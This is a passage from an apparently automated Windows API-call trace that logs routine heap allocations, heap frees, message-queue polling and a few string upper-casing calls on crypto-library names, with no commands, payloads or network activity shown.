hHeap=0x970000) returned 1 [0135.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0135.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0135.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0135.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0135.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0135.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0135.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0135.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0135.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0135.365] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0135.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0135.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0135.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0135.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0135.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0135.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0135.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0135.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0135.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0135.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0135.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0135.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0135.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0135.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0135.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0135.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0135.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0135.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0135.366] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0135.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0135.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0135.366] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0135.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0135.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0135.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0135.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0135.366] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0135.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0135.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0135.366] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0135.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0135.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0135.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0135.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0135.366] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0135.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0135.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0135.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0135.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0135.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0135.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0135.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0135.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0135.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0135.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0135.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0135.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0135.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0135.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0135.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0135.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0135.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0135.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0135.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0135.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0135.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0135.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0135.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0135.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0135.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0135.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0135.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0135.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0135.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0135.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0135.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0135.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0135.367] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0135.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0135.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0135.367] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0135.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0135.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0135.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0135.368] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0135.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0135.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0135.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0135.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0135.368] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0135.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0135.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0135.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0135.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0135.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0135.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0135.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0135.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0135.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0135.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0135.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0135.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0135.368] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0135.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0135.368] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0135.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0135.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0135.368] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0135.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0135.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0135.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0135.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0135.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0135.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0135.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0135.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0135.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0135.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0135.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0135.369] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0135.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0135.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0135.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0135.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0135.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0135.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0135.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0135.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0135.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0135.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0135.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0135.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0135.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0135.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0135.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0135.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0135.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0135.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0135.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0135.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0135.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0135.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0135.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0135.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0135.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0135.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0135.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0135.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0135.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0135.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0135.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0135.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0135.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0135.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0135.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0135.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0135.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0135.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0135.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0135.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0135.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0135.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0135.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0135.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0135.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0135.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0135.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0135.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0135.370] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0135.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0135.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0135.371] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0135.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0135.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0135.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0135.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0135.371] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0135.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0135.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0135.371] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0135.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0135.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0135.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0135.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0135.371] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0135.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0135.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0135.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0135.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0135.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0135.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0135.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0135.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0135.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0135.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0135.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0135.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0135.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0135.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0135.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0135.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0135.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0135.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0135.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0135.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0135.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0135.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0135.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0135.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0135.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0135.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0135.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0135.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0135.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0135.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0135.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0135.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0135.372] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0135.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0135.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0135.372] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0135.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0135.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0135.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0135.372] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0135.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0135.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0135.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0135.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0135.373] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0135.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0135.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0135.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0135.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0135.373] HeapFree (in: hHeap=0x970000, 